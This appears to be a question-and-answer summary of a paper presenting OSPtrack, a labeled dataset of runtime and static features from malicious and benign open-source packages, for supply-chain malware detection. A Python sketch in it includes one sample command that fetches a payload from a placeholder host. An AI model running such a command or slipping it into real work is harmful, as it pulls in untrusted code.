Abstract: Open-source software serves as a foundation for the internet and the cyber supply chain, but its exploitation is becoming increasingly prevalent. While advances in vulnerability detection for OSS have been significant, prior research has largely focused on static code analysis, often neglecting runtime indicators. To address this shortfall, we created a comprehensive dataset spanning five ecosystems, capturing features generated during the execution of packages and libraries in isolated environments. The dataset includes 9,461 package reports, of which 1,962 are identified as malicious, and encompasses both static and dynamic features such as files, sockets, commands, and DNS records. Each report is labeled with verified information and detailed sub-labels for attack types, facilitating the identification of malicious indicators when source code is unavailable. This dataset supports runtime detection, enhances detection model training, and enables efficient comparative analysis across ecosystems, contributing to the strengthening of supply chain security.

What problem does this paper attempt to address?

This paper addresses the shortcomings of existing open-source software (OSS) vulnerability detection methods, in particular the inability of static code analysis to capture runtime behavior. Specifically:

1. **Limitations of Static Code Analysis**: Most existing research focuses on static code analysis and ignores runtime indicators, which leaves OSS vulnerabilities embedded in complex systems insufficiently detected.
2. **Lack of a Comprehensive Dataset for OSS Runtime Behavior**: Some publicly available datasets collect malicious packages and libraries, but they do not cover runtime behavior, especially dynamic features such as files, sockets, commands, and DNS records.

To address these problems, the authors created a comprehensive dataset named OSPtrack, which has the following characteristics:

- **Multi-Ecosystem Coverage**: The dataset covers five major open-source software ecosystems (npm, pypi, crates.io, nuget, packagist), ensuring a wide range of application scenarios.
- **Static and Dynamic Features**: Each report includes not only the results of static code analysis but also the dynamic features generated at runtime, such as file operations, network activities, and command executions.
- **Detailed Label Information**: Each report is labeled with verification information and detailed sub-labels that identify attack types (such as data leakage and malicious command execution), enabling the identification of malicious behavior even in the absence of source code.

By providing this dataset, the authors aim to support runtime detection, improve the training of detection models, and enable efficient comparative analysis across ecosystems, thereby strengthening supply chain security.
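To make the shape of such a report concrete, the following is a minimal sketch of how one labeled package report could be modeled. The class name `PackageReport`, every field name, and the helper `runtime_indicator_counts` are hypothetical and chosen only for illustration; they are not OSPtrack's actual schema, which is not described here.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# The five ecosystems named in the summary above.
ECOSYSTEMS = {"npm", "pypi", "crates.io", "nuget", "packagist"}


@dataclass
class PackageReport:
    """Hypothetical record for one package report (not the real schema)."""

    ecosystem: str
    name: str
    version: str
    # Dynamic feature groups mentioned in the abstract.
    files: List[str] = field(default_factory=list)
    sockets: List[str] = field(default_factory=list)
    commands: List[str] = field(default_factory=list)
    dns: List[str] = field(default_factory=list)
    # Label and optional attack-type sub-label.
    malicious: bool = False
    attack_type: Optional[str] = None

    def __post_init__(self) -> None:
        if self.ecosystem not in ECOSYSTEMS:
            raise ValueError(f"unknown ecosystem: {self.ecosystem!r}")
        # Assumption: a sub-label only makes sense on a malicious report.
        if self.attack_type is not None and not self.malicious:
            raise ValueError("attack_type set on a non-malicious report")


def runtime_indicator_counts(report: PackageReport) -> Dict[str, int]:
    """Count the observed entries in each dynamic feature group."""
    return {
        "files": len(report.files),
        "sockets": len(report.sockets),
        "commands": len(report.commands),
        "dns": len(report.dns),
    }


example = PackageReport(
    ecosystem="npm",
    name="example-pkg",  # made-up package name
    version="1.0.0",
    commands=["curl http://example.invalid/payload"],
    dns=["example.invalid"],
    malicious=True,
    attack_type="malicious command execution",
)
print(runtime_indicator_counts(example))
```

Keeping each feature group as a separate list mirrors the point that runtime indicators can be inspected without access to source code; a real loader would map these fields onto whatever format the published dataset uses.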
### Formula Representation

The paper does not involve complex mathematical formulas. The key statistics of the dataset are:

- The dataset includes 9,461 package reports, of which 1,962 are confirmed as malicious.
- The dataset covers 8-dimensional features, including file, socket, command, and DNS-related behaviors.

These figures convey the scale and content of the dataset.
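The two report counts above are enough to work out the class balance, which matters when training a detection model on the data. The sketch below uses only those two figures; the function name `class_balance` is hypothetical, and treating every report not identified as malicious as a single "other" class is an assumption rather than something the summary states.

```python
TOTAL_REPORTS = 9461       # package reports in the dataset
MALICIOUS_REPORTS = 1962   # reports identified as malicious


def class_balance(total: int, malicious: int) -> dict:
    """Return the count of remaining reports and the malicious share."""
    if total <= 0 or not 0 <= malicious <= total:
        raise ValueError("counts must satisfy 0 <= malicious <= total, total > 0")
    other = total - malicious  # assumption: everything else is one class
    return {
        "other": other,
        "malicious_share": malicious / total,
    }


balance = class_balance(TOTAL_REPORTS, MALICIOUS_REPORTS)
print(balance["other"])                      # 7499
print(round(balance["malicious_share"], 3))  # 0.207
```

Roughly one report in five is malicious, so a classifier trained on the raw data would see an imbalanced but not extreme label distribution.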

OSPtrack: A Labeled Dataset Targeting Simulated Execution of Open-Source Software
